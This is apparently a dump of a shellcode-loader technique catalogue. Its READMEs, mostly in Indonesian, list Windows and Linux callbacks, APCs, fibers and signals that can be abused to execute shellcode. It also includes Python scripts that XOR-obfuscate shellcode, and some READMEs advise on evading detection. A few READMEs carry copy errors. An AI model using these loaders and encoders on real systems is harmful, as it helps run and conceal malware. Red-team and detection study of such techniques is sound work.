10 | 11 | ```c++ 12 | #include 13 | 14 | typedef int (*callback_t)(const char *, const struct stat *, int); 15 | 16 | int ftw(const char * dirpath, callback_t callback, int openfd); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [Man 3](https://man7.org/linux/man-pages/man3/ftw.3.html) -------------------------------------------------------------------------------- /linux/execution/event/signal/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by raising signal. 4 | 5 | ### Overview 6 | 7 | Daftarkan shellcode ke sebuah signal tertentu dengan `signal` dan eksekusi dengan memicu signal yang sesuai. 8 | 9 | Gunakan signal yang umum terjadi seperti: SIGUSR1, SIGUSR2, SIGCHLD. Hindari memicu signal mencurigakan seperti SIGSEGV, SIGILL, dsb. 10 | 11 | ```c++ 12 | #include 13 | 14 | typedef void (*callback_t)(int); 15 | 16 | callback_t signal(int signum, callback_t handler); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [Man 2](https://man7.org/linux/man-pages/man2/signal.2.html) -------------------------------------------------------------------------------- /windows/execution/callback/CryptEnumKeyIdentifierProperties/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CryptEnumKeyIdentifierProperties`. 
8 | 9 | ```c++ 10 | BOOL CryptEnumKeyIdentifierProperties (const CRYPT_HASH_BLOB *pKeyIdentifier, DWORD dwPropId, DWORD dwFlags, LPCWSTR pwszComputerName, void *pvReserved, void *pvArg, PFN_CRYPT_ENUM_KEYID_PROP pfnEnum); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CryptEnumKeyIdentifierProperties](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumkeyidentifierproperties) -------------------------------------------------------------------------------- /windows/writing/custom/xor-singlekey-ctr/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | 9 | # generate single byte key 10 | key = random.randrange(1, 255) 11 | 12 | # xor-encrypt 13 | enc_shcode = [key] 14 | 15 | for c in shcode: 16 | enc_shcode.append(c ^ key) 17 | key = (key + 1) & 0xFF 18 | 19 | # print as C-array 20 | print("{ ", end='') 21 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 22 | print(" }") 23 | 24 | print(f"Length: {len(enc_shcode)}") -------------------------------------------------------------------------------- /windows/execution/callback/EnumDesktops/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumDesktops`. 
8 | 9 | ```c++ 10 | BOOL EnumDesktopsA (HWINSTA hwinsta, DESKTOPENUMPROCA lpEnumFunc, LPARAM lParam); 11 | 12 | BOOL EnumDesktopsW (HWINSTA hwinsta, DESKTOPENUMPROCW lpEnumFunc, LPARAM lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumDesktopsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsa) 18 | - [MSDN EnumDesktopsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumPageFiles/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumPageFiles`. 8 | 9 | ```c++ 10 | BOOL EnumPageFilesA (PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine, LPVOID pContext); 11 | 12 | BOOL EnumPageFilesW (PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine, LPVOID pContext); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumPageFilesA](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesa) 18 | - [MSDN EnumPageFilesW](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesw) -------------------------------------------------------------------------------- /windows/execution/callback/SHBrowseForFolder/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SHBrowseForFolder`. 
8 | 9 | ```c++ 10 | PIDLIST_ABSOLUTE SHBrowseForFolderA (LPBROWSEINFOA lpbi); 11 | 12 | PIDLIST_ABSOLUTE SHBrowseForFolderW (LPBROWSEINFOA lpbi); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN SHBrowseForFolderA](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfoldera) 18 | - [MSDN SHBrowseForFolderW](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfolderw) -------------------------------------------------------------------------------- /windows/execution/callback/ChooseColor/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ChooseColor`. 8 | 9 | ```c++ 10 | BOOL ChooseColor (LPCHOOSECOLOR lpcc); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ChooseColor](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646912(v=vs.85)) 16 | - [MSDN structure CHOOSECOLORA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolora-r1) 17 | - [MSDN structure CHOOSECOLORW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolorw-r1) -------------------------------------------------------------------------------- /windows/execution/callback/PageSetupDlg/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `PageSetupDlg`. 
8 | 9 | ```c++ 10 | BOOL PageSetupDlg (LPPAGESETUPDLG lpcf); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN PageSetupDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646937(v=vs.85)) 16 | - [MSDN structure PAGESETUPDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlga) 17 | - [MSDN structure PAGESETUPDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlgw) -------------------------------------------------------------------------------- /linux/execution/event/sigaction/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by raising signal (with sigaction). 4 | 5 | ### Overview 6 | 7 | Daftarkan shellcode ke sebuah signal tertentu dengan `sigaction` dan eksekusi dengan memicu signal yang sesuai. 8 | 9 | Gunakan signal yang umum terjadi seperti: SIGUSR1, SIGUSR2, SIGCHLD. Hindari memicu signal mencurigakan seperti SIGSEGV, SIGILL, dsb. 10 | 11 | ```c++ 12 | #include 13 | 14 | int sigaction(int signum, const struct sigaction *act, struct sigaction * oldact); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [Man 2](https://man7.org/linux/man-pages/man2/sigaction.2.html) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLanguageGroups/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemLanguageGroups`. 
8 | 9 | ```c++ 10 | BOOL EnumSystemLanguageGroupsA (LANGUAGEGROUP_ENUMPROCA lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam); 11 | 12 | BOOL EnumSystemLanguageGroupsW (LANGUAGEGROUP_ENUMPROCW lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumSystemLanguageGroups](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) -------------------------------------------------------------------------------- /windows/execution/callback/EnumWindowStations/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumWindowStations`. 8 | 9 | ```c++ 10 | BOOL EnumWindowStationsA (WINSTAENUMPROCA lpEnumFunc, LPARAM lParam); 11 | 12 | BOOL EnumWindowStationsW (WINSTAENUMPROCW lpEnumFunc, LPARAM lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumWindowStationsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsa) 18 | - [MSDN EnumWindowStationsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsw) -------------------------------------------------------------------------------- /windows/execution/callback/NotifyUnicastIpAddressChange/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyUnicastIpAddressChange`. 
8 | 9 | ```c++ 10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 11 | NotifyUnicastIpAddressChange (ADDRESS_FAMILY Family, PUNICAST_IPADDRESS_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle); 12 | ``` 13 | 14 | ### Reference 15 | 16 | - [MSDN NotifyUnicastIpAddressChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyunicastipaddresschange) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLocales/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemLocales`. 8 | 9 | ```c++ 10 | BOOL EnumSystemLocalesA (LOCALE_ENUMPROCA lpLocaleEnumProc, DWORD dwFlags); 11 | 12 | BOOL EnumSystemLocalesW (LOCALE_ENUMPROCW lpLocaleEnumProc, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumSystemLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesa) 18 | - [MSDN EnumSystemLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesw) -------------------------------------------------------------------------------- /windows/execution/event/QueueUserAPC/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call). 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `QueueUserAPC`. 
```c++
DWORD QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);

NTSTATUS NtTestAlert();
```

### Reference

- [MSDN QueueUserAPC](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc)
- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)

--------------------------------------------------------------------------------
/windows/writing/encryption/block/hierocrypt3/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption

### Overview

`Hierocrypt3` encryption with an in-house implementation, without using any third-party API.

`Hierocrypt3` offers several key sizes, but the example implementation uses a 128-bit key.

### References

- [Reversing.ID Hierocrypt3 Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Hierocrypt-3)
- [Reversing.ID Hierocrypt3 Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Hierocrypt3/code.c)

--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen = len(shcode)

# pad to an even length so every byte has a pair
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen += 1

# encode shellcode: the first byte of each pair is kept as the key,
# the second byte is XORed with it
enc_shcode = []
idx = 0
while idx < shlen:
    key = shcode[idx]

    enc_shcode.append(key)
    enc_shcode.append(key ^ shcode[idx + 1])

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")

--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormats/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDateFormats`.

```c++
BOOL EnumDateFormatsA (DATEFMT_ENUMPROCA lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);

BOOL EnumDateFormatsW (DATEFMT_ENUMPROCW lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumDateFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsa)
- [MSDN EnumDateFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsw)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormats/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumTimeFormats`.
```c++
BOOL EnumTimeFormatsA (TIMEFMT_ENUMPROCA lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);

BOOL EnumTimeFormatsW (TIMEFMT_ENUMPROCW lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumTimeFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsa)
- [MSDN EnumTimeFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsw)

--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiberEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Execute shellcode with `CreateFiberEx`.

```c++
LPVOID CreateFiberEx (SIZE_T dwStackCommitSize, SIZE_T dwStackReserveSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);

LPVOID ConvertThreadToFiber(LPVOID lpParameter);
```

### Reference

- [MSDN CreateFiberEx](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiberex)
- [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber)

--------------------------------------------------------------------------------
/windows/execution/callback/mmioInstallIOProc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `mmioInstallIOProc`.
```c++
LPMMIOPROC mmioInstallIOProc (FOURCC fccIOProc, LPMMIOPROC pIOProc, DWORD dwFlags);

MCIERROR mciSendString (LPCTSTR lpszCommand, LPTSTR lpszReturnString, UINT cchReturn, HANDLE hwndCallback);
```

### Reference

- [MSDN mmioInstallIOProc](https://docs.microsoft.com/en-us/windows/win32/api/mmiscapi/nf-mmiscapi-mmioinstallioproc)
- [MSDN mciSendString](https://docs.microsoft.com/en-us/previous-versions//dd757161(v=vs.85))

--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemCodePages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumSystemCodePages`.

```c++
BOOL EnumSystemCodePagesA (CODEPAGE_ENUMPROCA lpCodePageEnumProc, DWORD dwFlags);

BOOL EnumSystemCodePagesW (CODEPAGE_ENUMPROCW lpCodePageEnumProc, DWORD dwFlags);
```

### Reference

- [MSDN EnumSystemCodePagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesa)
- [MSDN EnumSystemCodePagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesw)

--------------------------------------------------------------------------------
/windows/writing/custom/printable/c++/generate.py:
--------------------------------------------------------------------------------
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen = len(shcode)

# encode shellcode: each byte becomes two bytes, one per nibble;
# the data nibble is the low nibble, the high nibble is a random value in 0x2..0x5
enc_shcode = []

for B in shcode:
    L, R = (B >> 4), (B & 0x0F)

    n = random.randrange(2, 6)
    enc_shcode.append((n << 4 | L) & 0xFF)

    n = random.randrange(2, 6)
    enc_shcode.append((n << 4 | R) & 0xFF)

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")

--------------------------------------------------------------------------------
/windows/execution/callback/SymEnumProcesses/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `SymEnumProcesses`.

```c++
BOOL IMAGEAPI SymEnumProcesses (PSYM_ENUMPROCESSES_CALLBACK EnumProcessesCallback, PVOID UserContext);

BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
```

### Reference

- [MSDN SymEnumProcesses](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symenumprocesses)
- [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)

--------------------------------------------------------------------------------
/linux/allocation/pvalloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation using `pvalloc`. The `pvalloc` function allocates a memory block that starts at a page-aligned address (a multiple of the page size).

`pvalloc` is similar to `valloc` (from `stdlib.h`). The difference is that `pvalloc` rounds the requested size up to a multiple of the page size.

Note that `pvalloc` is legacy and has been superseded by `memalign`.
```c++
#include <malloc.h>

void * pvalloc(size_t size);
```

### Reference

- [Man 3](https://linux.die.net/man/3/pvalloc)

--------------------------------------------------------------------------------
/windows/execution/callback/CallWindowProc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CallWindowProc`.

```c++
LRESULT CallWindowProcA (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);

LRESULT CallWindowProcW (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
```

### Reference

- [MSDN CallWindowProcA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowproca)
- [MSDN CallWindowProcW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormatsEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDateFormatsEx`.
```c++
BOOL EnumDateFormatsExA (DATEFMT_ENUMPROCEXA lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);

BOOL EnumDateFormatsExW (DATEFMT_ENUMPROCEXW lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumDateFormatsExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexa)
- [MSDN EnumDateFormatsExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexw)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumUILanguages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumUILanguages`.

```c++
BOOL EnumUILanguagesA (UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);

BOOL EnumUILanguagesW (UILANGUAGE_ENUMPROCW lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);
```

### Reference

- [MSDN EnumUILanguagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesa)
- [MSDN EnumUILanguagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesw)

--------------------------------------------------------------------------------
/linux/allocation/memalign/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation using `memalign`. The `pvalloc` function allocates a memory block that starts at a page-aligned address (a multiple of the page size).

`pvalloc` is similar to `valloc` (from `stdlib.h`). The difference is that `pvalloc` rounds the requested size up to a multiple of the page size.
Note that `pvalloc` is legacy and has been superseded by `memalign`.

```c++
#include <malloc.h>

void * memalign(size_t alignment, size_t size);
```

### Reference

- [Man 3](https://linux.die.net/man/3/pvalloc)

--------------------------------------------------------------------------------
/windows/execution/callback/NotifyIpInterfaceChange/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `NotifyIpInterfaceChange`.

This function is available on Windows Vista and later.

```c++
IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
NotifyIpInterfaceChange (ADDRESS_FAMILY Family, PIPINTERFACE_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
```

### Reference

- [MSDN NotifyIpInterfaceChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyipinterfacechange)

--------------------------------------------------------------------------------
/windows/execution/callback/PropertySheet/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `PropertySheet`.
```c++
INT_PTR PropertySheetA (LPCPROPSHEETHEADERA header);

INT_PTR PropertySheetW (LPCPROPSHEETHEADERW header);
```

### Reference

- [MSDN PropertySheetA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheeta)
- [MSDN PropertySheetW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheetw)
- [MSDN structure PROPSHEETHEADER](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetheader)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfo/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumCalendarInfo`.

```c++
BOOL EnumCalendarInfoA (CALINFO_ENUMPROCA lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);

BOOL EnumCalendarInfoW (CALINFO_ENUMPROCW lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);
```

### Reference

- [MSDN EnumCalendarInfoA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoa)
- [MSDN EnumCalendarInfoW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfow)

--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transform the shellcode with custom algorithm.

### Overview

XOR the shellcode with a value produced by an `LFSR (Linear Feedback Shift Register)`. The byte sequence produced by the `LFSR` is pseudo-random, so every shellcode byte is XORed with a different value.
The `LFSR` is started from an initial value (`seed`), which can be any byte. Here the seed can be a byte supplied explicitly, or it can be the first byte of the shellcode.

In this example, the shellcode is stored in the following format: `[Seed] [Encoded Shellcode]`.

--------------------------------------------------------------------------------
/linux/execution/thread/pthread_create/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `pthread_create` and wait for it to finish with `pthread_join`.

```c++
#include <pthread.h>

typedef void* (*entrypoint_t)(void*);

int pthread_create(pthread_t * thread, const pthread_attr_t * attr, entrypoint_t start_routine, void * arg);

int pthread_join(pthread_t thread, void ** retval);
```

### Reference

- [Man 3 pthread_create](https://man7.org/linux/man-pages/man3/pthread_create.3.html)
- [Man 3 pthread_join](https://man7.org/linux/man-pages/man3/pthread_join.3.html)

--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumCalendarInfoEx`.
```c++
BOOL EnumCalendarInfoExA (CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);

BOOL EnumCalendarInfoExW (CALINFO_ENUMPROCEXW lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);
```

### Reference

- [MSDN EnumCalendarInfoExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexa)
- [MSDN EnumCalendarInfoExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexw)

--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThreadEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode by queueing into APC (Asynchronous Procedure Call).

### Overview

Execute shellcode with `NtQueueApcThreadEx`.

```c++
NTSTATUS
NtQueueApcThreadEx (HANDLE ThreadHandle, USER_APC_OPTION UserApcOption, PPS_APC_ROUTINE ApcRoutine, PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3);

NTSTATUS NtTestAlert();
```

### Reference

- [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
- [BLOG APC Series: User APC API](https://repnz.github.io/posts/apc/user-apc/)

--------------------------------------------------------------------------------
/linux/execution/event/atexit/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode at process exit.

### Overview

Register the shellcode with `atexit` so that it runs automatically just before the process terminates.

`atexit` registers a handler that is normally used for cleanup (releasing resources) or for terminating any other activity.
It is a standard function of the C standard library, so the same technique applies on other platforms as well.

```c++
#include <stdlib.h>

int atexit(void (*func)(void));
```

### Reference

- [Linux Man 3](https://man7.org/linux/man-pages/man3/atexit.3.html)
- [C++ Reference](http://en.cppreference.com/w/c/program/atexit)

--------------------------------------------------------------------------------
/windows/execution/callback/DrawState/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DrawState`.

```c++
BOOL DrawStateA (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);

BOOL DrawStateW (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);
```

### Reference

- [MSDN DrawStateA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatea)
- [MSDN DrawStateW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatew)

--------------------------------------------------------------------------------
/windows/execution/callback/GrayString/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `GrayString`.
```c++
BOOL GrayStringA (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);

BOOL GrayStringW (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);
```

### Reference

- [MSDN GrayStringA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringa)
- [MSDN GrayStringW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringw)

--------------------------------------------------------------------------------
/windows/execution/callback/mciSetYieldProc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `mciSetYieldProc`.

The shellcode is invoked periodically while the MCI device is processing a command issued with the MCI_WAIT flag.

```c++
UINT mciSetYieldProc (MCIDEVICEID IDDevice, YIELDPROC yp, DWORD dwYieldData);

MCIERROR mciSendCommand (MCIDEVICEID IDDevice, UINT uMsg, DWORD_PTR fdwCommand, DWORD_PTR dwParam);
```

### Reference

- [MSDN mciSetYieldProc](https://docs.microsoft.com/en-us/previous-versions/dd757163(v=vs.85))
- [MSDN mciSendCommand](https://docs.microsoft.com/en-us/previous-versions//dd757160(v=vs.85))

--------------------------------------------------------------------------------
/windows/execution/fiber/FlsAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a fiber.

### Overview

Execute shellcode with `FlsAlloc`.

`FlsAlloc` allocates an `FLS (Fiber Local Storage)` index, which can then be used to store and retrieve data local to a fiber.
```c++
DWORD FlsAlloc (PFLS_CALLBACK_FUNCTION lpCallback);

BOOL FlsSetValue (DWORD dwFlsIndex, PVOID lpFlsData);
```

### Reference

- [MSDN FlsAlloc](https://docs.microsoft.com/fr-fr/windows/win32/api/fibersapi/nf-fibersapi-flsalloc)
- [MSDN FlsSetValue](https://docs.microsoft.com/en-us/windows/win32/api/fibersapi/nf-fibersapi-flssetvalue)

--------------------------------------------------------------------------------
/linux/execution/callback/nftw/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `nftw` (glibc).

`nftw` is a POSIX function used to walk the files in a directory tree. The callback is invoked for every file found.

`nftw` is the replacement for `ftw`, which is now deprecated.

```c++
#include <ftw.h>

typedef int (*callback_t)(const char *, const struct stat *, int, struct FTW *);

int nftw(const char * dirpath, callback_t callback, int openfd, int flags);
